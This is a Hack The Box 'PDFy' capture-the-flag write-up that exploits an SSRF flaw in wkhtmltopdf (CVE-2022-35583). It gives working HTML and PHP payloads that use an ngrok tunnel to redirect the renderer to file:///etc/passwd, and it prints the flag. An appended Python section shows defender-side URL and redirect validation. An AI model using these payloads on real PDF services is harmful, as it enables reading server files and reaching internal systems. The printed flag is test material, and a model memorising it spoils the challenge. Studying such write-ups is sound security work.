
PDFy

https://app.hackthebox.com/challenges/PDFy

Last updated 8 months ago

By intercepting the request and changing the URL, we can see that wkhtmltopdf is used to create the PDFs.

We can use this CVE (CVE-2022-35583, SSRF in wkhtmltopdf 0.12.6, linked below) to get the flag from /etc/passwd.

index.html
<!DOCTYPE html>
<html>
<body>
    <!-- the iframe points at our ngrok tunnel; flag.php there redirects the renderer to a file:// URL -->
    <iframe src="http://0.tcp.eu.ngrok.io:15500/flag.php?x=/etc/passwd" style="height:800px;width:100%"></iframe>
</body>
</html>
flag.php
<?php header('Location: file://' . $_REQUEST['x']); ?>

First we start the PHP server:

php -S 127.0.0.1:8000

We need an ngrok account and must enter a valid credit card ("We require a valid card as a way to combat abuse and keep the internet a safe place"):

ngrok tcp 127.0.0.1:8000

We copy the TCP address ngrok prints and change the protocol to http. We enter host and port in our index.html and send the URL to the server.

HTB{pdF_g3n3r4t1on_g03s_brrr!}

Reference: [Security 9.8 CRITICAL] CVE-2022-35583 - wkhtmlTOpdf 0.12.6 is vulnerable to SSRF (Server-side request forgery) · Issue #5249 · wkhtmltopdf/wkhtmltopdf (GitHub)
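As an added, defender-side example (not part of the write-up and not code from the PDFy challenge), the following Python sketch shows the check a PDF-generation service should run on a user-supplied URL before handing it to a renderer such as wkhtmltopdf: only http(s) schemes, no hosts that resolve to loopback, private or link-local ranges, and re-validation of every redirect hop, which blocks the public-URL-to-file:// redirect this write-up relies on. All names in it (validate_render_target, fetch_with_checked_redirects, fake_fetch, fake_resolver, the .test hostnames and the 1.2.3.4 address) are assumptions made for the example.

```python
import ipaddress
import socket
from urllib.parse import urlparse, urljoin

# Added example (not from the write-up): defender-side validation for a "render this URL
# as PDF" feature. It rejects non-http(s) schemes (file://, gopher://, ...), hosts that are
# or resolve to loopback/private/link-local addresses, and re-validates every redirect hop,
# which is exactly the path abused above: a public URL answering "Location: file:///etc/passwd".
ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 5
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def host_is_public(host, resolver=socket.gethostbyname):
    """True only if `host` is (or resolves to) a globally routable unicast address.

    ipaddress' is_global rejects loopback, RFC 1918, link-local (including the
    169.254.169.254 cloud metadata endpoint), documentation and other reserved ranges.
    """
    try:
        ip = ipaddress.ip_address(host)                 # literal IPv4/IPv6 in the URL
    except ValueError:
        try:
            ip = ipaddress.ip_address(resolver(host))   # DNS name: check what it resolves to
        except (OSError, ValueError):
            return False                                # unresolvable: fail closed
    return ip.is_global and not ip.is_multicast


def validate_render_target(url, resolver=socket.gethostbyname):
    """Return (ok, reason) for a URL the PDF generator is about to load."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parsed.scheme!r} not allowed"
    if not parsed.hostname:
        return False, "missing host"
    if parsed.username or parsed.password:
        return False, "credentials in URL not allowed"
    if not host_is_public(parsed.hostname, resolver):
        return False, f"host {parsed.hostname!r} is not a public address"
    return True, "ok"


def fetch_with_checked_redirects(url, fetch, resolver=socket.gethostbyname):
    """Fetch `url`, following redirects by hand so that each hop is validated.

    `fetch(url)` must return (status, headers, body) and must NOT follow redirects
    itself (for example requests.get(url, allow_redirects=False)).
    """
    current = url
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = validate_render_target(current, resolver)
        if not ok:
            raise ValueError(f"blocked {current}: {reason}")
        status, headers, body = fetch(current)
        if status in REDIRECT_STATUSES:
            location = headers.get("Location")
            if not location:
                raise ValueError(f"{current}: redirect without Location header")
            current = urljoin(current, location)   # relative Location resolves against current URL
            continue
        return current, body
    raise ValueError(f"{url}: more than {MAX_REDIRECTS} redirects")


def check_chain(url, fetch, resolver=socket.gethostbyname):
    """Wrapper returning ('ok', final_url) or ('blocked', reason) instead of raising."""
    try:
        final_url, _body = fetch_with_checked_redirects(url, fetch, resolver)
        return "ok", final_url
    except ValueError as exc:
        return "blocked", str(exc)


# Constructed stand-in for the HTTP client: models the flag.php-style redirect to file://
# and a redirect into the loopback range. Real code would use a client with redirects disabled.
def fake_fetch(url):
    if url.endswith("/flag.php?x=/etc/passwd"):
        return 302, {"Location": "file:///etc/passwd"}, b""
    if url.endswith("/to-internal"):
        return 302, {"Location": "http://127.0.0.1:8000/"}, b""
    return 200, {"Content-Type": "text/html"}, b"<html>hello</html>"


def fake_resolver(host):
    """Constructed resolver: every name maps to a public address so the scheme/redirect checks run offline."""
    return "1.2.3.4"


if __name__ == "__main__":
    for target in ("http://untrusted.test/flag.php?x=/etc/passwd",
                   "http://untrusted.test/to-internal",
                   "http://untrusted.test/page.html",
                   "file:///etc/passwd"):
        print(target, "->", check_chain(target, fake_fetch, fake_resolver))
```

This only covers the top-level URL the service fetches itself. A renderer like wkhtmltopdf loads iframes, images and other sub-resources on its own, so the same redirect trick can reappear inside the page; the renderer therefore still needs local file access disabled (wkhtmltopdf's --disable-local-file-access option) and should run in a sandbox with no network route to internal services or metadata endpoints.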